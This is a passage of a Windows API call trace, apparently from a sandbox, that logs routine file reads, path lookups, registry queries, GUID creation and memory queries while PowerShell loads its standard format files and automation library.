lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.434] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.434] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.435] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0xbce, lpOverlapped=0x0) returned 1 [0135.435] ReadFile (in: hFile=0x308, lpBuffer=0x33d1e2e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d1e2e*, lpNumberOfBytesRead=0xcd038*=0x0, lpOverlapped=0x0) returned 1 [0135.435] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x0, lpOverlapped=0x0) returned 1 [0135.435] CloseHandle (hObject=0x308) returned 1 [0135.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.435] SetErrorMode (uMode=0x1) returned 0x1 [0135.435] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccfe0 | out: lpFileInformation=0xccfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0135.435] SetErrorMode (uMode=0x1) returned 0x1 [0135.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.436] CoTaskMemAlloc (cb=0x5a) returned 0x1b80a970 [0135.436] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd01c, lpData=0x1b80a970, lpcbData=0xcd018*=0x56 | out: lpType=0xcd01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd018*=0x56) returned 0x0 [0135.436] CoTaskMemFree (pv=0x1b80a970) [0135.436] RegCloseKey (hKey=0x308) returned 0x0 [0135.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.439] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x42384cbf, Data2=0xd261, Data3=0x4952, Data4=([0]=0xb1, [1]=0x6e, [2]=0xb4, [3]=0xf1, [4]=0xeb, [5]=0x5b, [6]=0xce, [7]=0x57))) returned 0x0 [0135.439] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x52bc2447, Data2=0x730b, Data3=0x4f40, Data4=([0]=0x8a, [1]=0x8f, [2]=0x7a, [3]=0x8, [4]=0x42, [5]=0x7a, [6]=0x27, [7]=0x13))) returned 0x0 [0135.439] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x2052f82d, Data2=0x725, Data3=0x4baf, Data4=([0]=0x85, [1]=0x59, [2]=0x5b, [3]=0x26, [4]=0xd5, [5]=0xed, [6]=0x68, [7]=0x5a))) returned 0x0 [0135.440] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x6d6ed309, Data2=0x842e, Data3=0x4299, Data4=([0]=0x91, [1]=0x22, [2]=0xd6, [3]=0x4e, [4]=0x22, [5]=0xd6, [6]=0x76, [7]=0x76))) returned 0x0 [0135.440] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x4e1ea99f, Data2=0x89a7, Data3=0x4d15, Data4=([0]=0xb0, [1]=0x7a, [2]=0xd6, [3]=0x18, [4]=0xb6, [5]=0x9c, [6]=0x49, [7]=0x7d))) returned 0x0 [0135.441] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x4259f4cd, Data2=0xf43d, Data3=0x4095, Data4=([0]=0xbd, [1]=0xc, [2]=0x4c, [3]=0x28, [4]=0xd4, [5]=0xa, [6]=0xb3, [7]=0x64))) returned 0x0 [0135.441] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.442] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x52c6ef59, Data2=0x8f3f, Data3=0x418f, Data4=([0]=0xb1, [1]=0xa1, [2]=0x51, [3]=0x69, [4]=0xd7, [5]=0xcd, [6]=0x3d, [7]=0xcb))) returned 0x0 [0135.442] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.443] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.444] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xedab97e7, Data2=0xab74, Data3=0x43ce, Data4=([0]=0xbc, [1]=0x22, [2]=0xb3, [3]=0x83, [4]=0x2e, [5]=0x74, [6]=0xbd, [7]=0x22))) returned 0x0 [0135.444] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xd429ceb3, Data2=0x83db, Data3=0x437e, Data4=([0]=0x92, [1]=0x5d, [2]=0xc3, [3]=0x21, [4]=0x9a, [5]=0x88, [6]=0xe2, [7]=0x6b))) returned 0x0 [0135.445] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x47955e36, Data2=0xf0e2, Data3=0x4016, Data4=([0]=0xa1, [1]=0x9a, [2]=0x4d, [3]=0x97, [4]=0x27, [5]=0xd1, [6]=0xea, [7]=0xe5))) returned 0x0 [0135.445] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x776e9266, Data2=0x95b8, Data3=0x4f6a, Data4=([0]=0xab, [1]=0xf1, [2]=0xab, [3]=0xdd, [4]=0x20, [5]=0x98, [6]=0xbb, [7]=0xd5))) returned 0x0 [0135.445] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.445] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x2ab932fb, Data2=0x79b7, Data3=0x4a32, Data4=([0]=0xb4, [1]=0xac, [2]=0x77, [3]=0x9e, [4]=0x11, [5]=0xff, [6]=0x46, [7]=0xa8))) returned 0x0 [0135.446] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.446] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.446] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.447] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.447] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.448] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x52965e09, Data2=0x4d0e, Data3=0x4e24, Data4=([0]=0x9f, [1]=0x6c, [2]=0x72, [3]=0x2f, [4]=0x31, [5]=0x9e, [6]=0xcb, [7]=0x3d))) returned 0x0 [0135.448] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x49f85862, Data2=0x311, Data3=0x4ea8, Data4=([0]=0x95, [1]=0x35, [2]=0x59, [3]=0x12, [4]=0x33, [5]=0x8b, [6]=0x18, [7]=0x20))) returned 0x0 [0135.449] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xcbcb4cde, Data2=0x6b38, Data3=0x48c9, Data4=([0]=0x85, [1]=0xd6, [2]=0x22, [3]=0x60, [4]=0xe4, [5]=0x89, [6]=0x8b, [7]=0xc6))) returned 0x0 [0135.449] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x5f94d3f2, Data2=0x43d9, Data3=0x4748, Data4=([0]=0x85, [1]=0xfe, [2]=0x2, [3]=0xa2, [4]=0xbd, [5]=0xde, [6]=0x94, [7]=0xd))) returned 0x0 [0135.449] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xef1b4bbd, Data2=0x63c3, Data3=0x4651, Data4=([0]=0x83, [1]=0xb2, [2]=0x7e, [3]=0xaf, [4]=0xc8, [5]=0x6d, [6]=0xe9, [7]=0x7d))) returned 0x0 [0135.450] VirtualQuery (in: lpAddress=0xcbf60, lpBuffer=0xcce20, dwLength=0x30 | out: lpBuffer=0xcce20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.450] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xcd26114c, Data2=0x4b0a, Data3=0x4948, Data4=([0]=0xbd, [1]=0xcc, [2]=0x87, [3]=0xf6, [4]=0xfd, [5]=0x70, [6]=0x3b, [7]=0xa8))) returned 0x0 [0135.450] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x57e524ac, Data2=0x313f, Data3=0x48e8, Data4=([0]=0xbd, [1]=0x9d, [2]=0xc6, [3]=0x7, [4]=0xf0, [5]=0x48, [6]=0xd6, [7]=0x0))) returned 0x0 [0135.451] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x23f16f80, Data2=0x83f6, Data3=0x4c98, Data4=([0]=0xb3, [1]=0x80, [2]=0x66, [3]=0x5b, [4]=0xd4, [5]=0xa1, [6]=0x15, [7]=0xdd))) returned 0x0 [0135.451] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x201813af, Data2=0xbaa6, Data3=0x4f54, Data4=([0]=0xa3, [1]=0xf8, [2]=0x82, [3]=0x5, [4]=0x3f, [5]=0xb, [6]=0x65, [7]=0x7b))) returned 0x0 [0135.451] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xd8afbe05, Data2=0x1d71, Data3=0x4cd2, Data4=([0]=0xa3, [1]=0x90, [2]=0x11, [3]=0x3f, [4]=0xef, [5]=0x6b, [6]=0x14, [7]=0xc2))) returned 0x0 [0135.452] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x7aa47b5f, Data2=0x14f4, Data3=0x439f, Data4=([0]=0x80, [1]=0xe1, [2]=0xe0, [3]=0x4, [4]=0x79, [5]=0x9d, [6]=0x1, [7]=0xd7))) returned 0x0 [0135.452] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xad2700c8, Data2=0x8bfd, Data3=0x4640, Data4=([0]=0x83, [1]=0xc4, [2]=0x7, [3]=0x6a, [4]=0xc1, [5]=0xbf, [6]=0x2e, [7]=0x69))) returned 0x0 [0135.452] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x7f32d403, Data2=0x827, Data3=0x49d6, Data4=([0]=0x9c, [1]=0xb8, [2]=0x79, [3]=0xe5, [4]=0x3d, [5]=0x5f, [6]=0x11, [7]=0xcc))) returned 0x0 [0135.453] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x1e7793f0, Data2=0x1c18, Data3=0x4b49, Data4=([0]=0xaf, [1]=0x66, [2]=0xf5, [3]=0x70, [4]=0x3c, [5]=0x8b, [6]=0x79, [7]=0xb7))) returned 0x0 [0135.453] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x1e315d51, Data2=0xf49a, Data3=0x4524, Data4=([0]=0xaf, [1]=0xd0, [2]=0x22, [3]=0xba, [4]=0xfd, [5]=0x7d, [6]=0xc2, [7]=0xd0))) returned 0x0 [0135.454] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x2d5bcfde, Data2=0xeda0, Data3=0x41a3, Data4=([0]=0xbf, [1]=0x30, [2]=0x3, [3]=0xde, [4]=0x2d, [5]=0x5e, [6]=0xf1, [7]=0xe8))) returned 0x0 [0135.454] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xc50397d2, Data2=0xd72f, Data3=0x4f6f, Data4=([0]=0x9f, [1]=0x71, [2]=0x80, [3]=0x83, [4]=0xfe, [5]=0x88, [6]=0x88, [7]=0x54))) returned 0x0 [0135.454] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xfe066532, Data2=0x1785, Data3=0x4908, Data4=([0]=0x9f, [1]=0x69, [2]=0xec, [3]=0xe6, [4]=0x5, [5]=0x80, [6]=0x27, [7]=0xfd))) returned 0x0 [0135.454] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x8ad3a398, Data2=0xe6ca, Data3=0x403c, Data4=([0]=0xbc, [1]=0xed, [2]=0xfe, [3]=0x6f, [4]=0xca, [5]=0x89, [6]=0x9d, [7]=0xe1))) returned 0x0 [0135.455] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x393ccc36, Data2=0x8940, Data3=0x43ab, Data4=([0]=0x9b, [1]=0x7d, [2]=0x4d, [3]=0x6f, [4]=0x8f, [5]=0x2f, [6]=0xec, [7]=0x4c))) returned 0x0 [0135.455] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xdcf96a5f, Data2=0x4508, Data3=0x4c69, Data4=([0]=0x98, [1]=0xa8, [2]=0xfe, [3]=0xfc, [4]=0x15, [5]=0x42, [6]=0x5a, [7]=0x3))) returned 0x0 [0135.455] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x36023ddd, Data2=0xfbee, Data3=0x4baa, Data4=([0]=0xb7, [1]=0x13, [2]=0x5d, [3]=0x66, [4]=0xfe, [5]=0x99, [6]=0x6b, [7]=0x53))) returned 0x0 [0135.456] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x82f0f60b, Data2=0x1c89, Data3=0x40c3, Data4=([0]=0xb6, [1]=0x6c, [2]=0xe8, [3]=0xb7, [4]=0x3a, [5]=0xda, [6]=0x91, [7]=0x5))) returned 0x0 [0135.456] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xed1defec, Data2=0xd75e, Data3=0x4803, Data4=([0]=0xaf, [1]=0xcc, [2]=0x36, [3]=0x96, [4]=0xed, [5]=0x8b, [6]=0x3c, [7]=0xa4))) returned 0x0 [0135.456] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.457] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.458] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.460] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x1dc8bb56, Data2=0x6490, Data3=0x4ed8, Data4=([0]=0xb7, [1]=0xc0, [2]=0xce, [3]=0xa8, [4]=0x93, [5]=0x3d, [6]=0x40, [7]=0x42))) returned 0x0 [0135.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0135.460] SetErrorMode (uMode=0x1) returned 0x1 [0135.460] SetErrorMode (uMode=0x1) returned 0x1 [0135.460] GetFileType (hFile=0x308) returned 0x1 [0135.461] ReadFile (in: hFile=0x308, lpBuffer=0x34e2ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x34e2ce0*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.462] ReadFile (in: hFile=0x308, lpBuffer=0x34e2ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x34e2ce0*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.463] ReadFile (in: hFile=0x308, lpBuffer=0x34e2ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x34e2ce0*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.463] ReadFile (in: hFile=0x308, lpBuffer=0x34e2ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x34e2ce0*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.463] ReadFile (in: hFile=0x308, lpBuffer=0x34e2ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x34e2ce0*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.463] ReadFile (in: hFile=0x308, lpBuffer=0x34e2ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x34e2ce0*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.464] ReadFile (in: hFile=0x308, lpBuffer=0x34e2ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x34e2ce0*, lpNumberOfBytesRead=0xcd038*=0x119, lpOverlapped=0x0) returned 1 [0135.464] ReadFile (in: hFile=0x308, lpBuffer=0x34e2ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x34e2ce0*, lpNumberOfBytesRead=0xcd038*=0x0, lpOverlapped=0x0) returned 1 [0135.464] CloseHandle (hObject=0x308) returned 1 [0135.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0135.464] SetErrorMode (uMode=0x1) returned 0x1 [0135.464] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccfe0 | out: lpFileInformation=0xccfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0135.464] SetErrorMode (uMode=0x1) returned 0x1 [0135.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0135.465] CoTaskMemAlloc (cb=0x5a) returned 0x1b80a970 [0135.465] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd01c, lpData=0x1b80a970, lpcbData=0xcd018*=0x56 | out: lpType=0xcd01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd018*=0x56) returned 0x0 [0135.465] CoTaskMemFree (pv=0x1b80a970) [0135.465] RegCloseKey (hKey=0x308) returned 0x0 [0135.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0135.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0135.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.467] VirtualQuery (in: lpAddress=0xcbb60, lpBuffer=0xcca20, dwLength=0x30 | out: lpBuffer=0xcca20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.468] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x5beacc05, Data2=0x4ed6, Data3=0x4d60, Data4=([0]=0xba, [1]=0xc5, [2]=0x26, [3]=0x4d, [4]=0x9f, [5]=0xee, [6]=0x37, [7]=0x54))) returned 0x0 [0135.468] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.470] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x9a1a9312, Data2=0x4197, Data3=0x4340, Data4=([0]=0xbf, [1]=0x35, [2]=0xd0, [3]=0x10, [4]=0xdd, [5]=0x36, [6]=0xd4, [7]=0x8e))) returned 0x0 [0135.471] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xd2069267, Data2=0x2b47, Data3=0x40b2, Data4=([0]=0x8d, [1]=0x97, [2]=0xac, [3]=0x3f, [4]=0x28, [5]=0x7a, [6]=0x76, [7]=0x9a))) returned 0x0 [0135.471] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xd3d3f4f3, Data2=0xe2b2, Data3=0x480f, Data4=([0]=0x8d, [1]=0xce, [2]=0x34, [3]=0xcf, [4]=0x45, [5]=0xbc, [6]=0x64, [7]=0xfe))) returned 0x0 [0135.471] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.472] VirtualQuery (in: lpAddress=0xcbca0, 